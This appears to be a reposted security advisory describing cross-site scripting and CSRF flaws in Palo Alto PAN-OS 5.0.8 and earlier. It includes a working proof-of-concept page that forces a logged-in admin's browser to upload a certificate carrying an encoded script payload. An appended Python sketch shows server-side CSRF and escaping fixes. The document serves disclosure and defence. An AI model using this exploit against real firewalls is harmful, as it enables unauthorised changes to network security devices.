from http://thomaspollet.blogspot.be/2013/11/Palo-Alto-XSS.html :

A couple of bugs exist in Palo Alto Networks PAN-OS <= 5.0.8 which can be exploited to conduct cross-site scripting attacks (and, through the upload forms, cross-site request forgery).

- Certificate fields are displayed in the firewall web interface without proper sanitization applied to them. This way it is possible to inject HTML into the web interface.

- Various file upload forms used by the firewall do not implement proper CSRF protection, import.certificate.php for example.

(screenshot: http://1.bp.blogspot.com/-eX46K2I1S7w/Uo93fo02D4I/AAAAAAAAAgM/QLjdd7QY3UM/s1600/Capture.PNG)

These issues have been fixed in PAN-OS 5.0.9.

Example HTML source code to CSRF POST a rogue cert:

PA: <input type="text" id="url" value="https://10.10.10.22">
<input type=button onclick="upload()" value="Upload Certificate"/>
<hr>
<textarea rows=80 cols=80 id=text>

-----------------------------
Content-Disposition: form-data; name="ext-comp-2304"

on
-----------------------------
Content-Disposition: form-data; name="certFile"; filename="server.crt"
Content-Type: application/octet-stream

-----BEGIN CERTIFICATE-----
MIICXTCCAcYCCQDlZ1PR5Cpx7DANBgkqhkiG9w0BAQUFADBzMQswCQYDVQQGEwJY
WDEvMC0GA1UECAwmPHN0eWxlIG9ubG9hZD0iamF2YXNjcmlwdDphbGVydCgxKSIg
Lz4xFTATBgNVBAcMDERlZmF1bHQgQ2l0eTEcMBoGA1UECgwTRGVmYXVsdCBDb21w
YW55IEx0ZDAeFw0xMzEwMDExNjI4MThaFw0xNDEwMDExNjI4MThaMHMxCzAJBgNV
BAYTAlhYMS8wLQYDVQQIDCY8c3R5bGUgb25sb2FkPSJqYXZhc2NyaXB0OmFsZXJ0
KDEpIiAvPjEVMBMGA1UEBwwMRGVmYXVsdCBDaXR5MRwwGgYDVQQKDBNEZWZhdWx0
IENvbXBhbnkgTHRkMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCx0bSaWF4g
mRUD8Djl3RHx8RQmO6pua8HBKAG+05PotfsuqImyh1aTVGCmDECFMfid/QAOL/FY
5qWKCmdXcAYTAi5oRIuhI7G9J9SInfFEdmW75HC1/pwhV2oR31a1XccYubGagcmu
gBadEXbhb6iU3QECx4d+zLAGadWEeWRF0wIDAQABMA0GCSqGSIb3DQEBBQUAA4GB
AAMSthJ0Z4+s4F8CMbNjEHgznV7AFNnZ9qsXRdP6N7jGFXwkpINhxoySHSsrDfmE
eefbJgdj5Js6PF+kMZlOeTCVo86GnAn64D17wcTsenmznH/iNj7yQM/AV7BMmRh2
FCMw2rOQLc2vZYC829s/nkShLl7iKYP/KewX3497VV3t
-----END CERTIFICATE-----

-----------------------------
Content-Disposition: form-data; name="ext-comp-2306"

Base64 Encoded Certificate (PEM)
-----------------------------
Content-Disposition: form-data; name="keyFile"; filename=""
Content-Type: application/octet-stream


-----------------------------
Content-Disposition: form-data; name="bImportCertificateSubmit"

OK
-----------------------------
Content-Disposition: form-data; name="certFileC"

server.crt
-----------------------------
Content-Disposition: form-data; name="vsysC"

shared
-----------------------------
Content-Disposition: form-data; name="passPhrase"


-----------------------------
Content-Disposition: form-data; name="keyFileC"


-----------------------------
Content-Disposition: form-data; name="certName"

TPOLLET
-----------------------------
Content-Disposition: form-data; name="format"

pem
-----------------------------
Content-Disposition: form-data; name="includekey"


-----------------------------
Content-Disposition: form-data; name="certType"

device
-----------------------------
Content-Disposition: form-data; name="template"


-------------------------------
</textarea>

<script>
function upload() {
  // The textarea holds the multipart body exactly as the firewall's own form would submit it.
  text = document.getElementById('text').value;
  host = document.getElementById('url').value;
  url = host + "/php/device/import.certificate.php";
  xhr = new XMLHttpRequest();
  xhr.withCredentials = true;
  xhr.open("POST", url, true);
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------");
  xhr.send(text);
  alert('check ' + host + '/#device::vsys1::device/certificate-management/certificates');
}
</script>
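As an added defensive illustration (not code from the advisory or from Palo Alto Networks), the Python below shows the two server-side checks the post implies for an endpoint like import.certificate.php: refuse a multipart upload unless it arrives from the firewall's own origin with a per-session anti-CSRF token, and HTML-escape certificate attribute strings before they are rendered in the certificate table. The csrf_token field, the handler names and the sample body are assumptions; the host 10.10.10.22 and the boundary are taken from the PoC above.

```python
import hmac
import html
import re
from urllib.parse import urlsplit

BOUNDARY = "---------------------------"  # boundary used by the advisory's PoC
# Constructed sample body: a subset of the PoC's fields plus a hypothetical csrf_token field.
SAMPLE_BODY = (
    b"-----------------------------\r\n"
    b'Content-Disposition: form-data; name="certFile"; filename="server.crt"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"-----BEGIN CERTIFICATE-----\r\nMIIC(constructed placeholder)\r\n-----END CERTIFICATE-----\r\n"
    b"-----------------------------\r\n"
    b'Content-Disposition: form-data; name="certName"\r\n\r\nTPOLLET\r\n'
    b"-----------------------------\r\n"
    b'Content-Disposition: form-data; name="csrf_token"\r\n\r\nsess-token-123\r\n'
    b"-------------------------------\r\n"
)

def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data splitter (not a full RFC 7578 parser): {field name: raw value}."""
    fields = {}
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):  # closing delimiter "--boundary--"
            break
        chunk = chunk.replace(b"\r\n", b"\n").lstrip(b"\n")
        head, _, value = chunk.partition(b"\n\n")
        m = re.search(rb';\s*name="([^"]*)"', head)  # match "; name=", not "; filename="
        if m:
            fields[m.group(1).decode()] = value.rstrip(b"\n")
    return fields

def csrf_ok(headers: dict, fields: dict, expected_host: str, session_token: str) -> bool:
    """Accept only same-origin submissions that carry the session's anti-CSRF token."""
    hdr = {k.lower(): v for k, v in headers.items()}
    src = hdr.get("origin") or hdr.get("referer") or ""
    if urlsplit(src).netloc != expected_host:  # absent, foreign or "null" origin -> reject
        return False
    return hmac.compare_digest(fields.get("csrf_token", b""), session_token.encode())

def render_attr(attr: str, value: str) -> str:
    """Escape a certificate attribute string before it is placed in the certificate table (the XSS fix)."""
    return f"<td>{html.escape(attr)}={html.escape(value)}</td>"

def handle_import(headers: dict, body: bytes, expected_host: str, session_token: str) -> str:
    # Simulated import.certificate.php: CSRF gate first, then accept the named certificate.
    fields = parse_multipart(body, BOUNDARY)
    if not csrf_ok(headers, fields, expected_host, session_token):
        return "rejected: cross-site request or missing token"
    return "accepted: " + fields["certName"].decode()
```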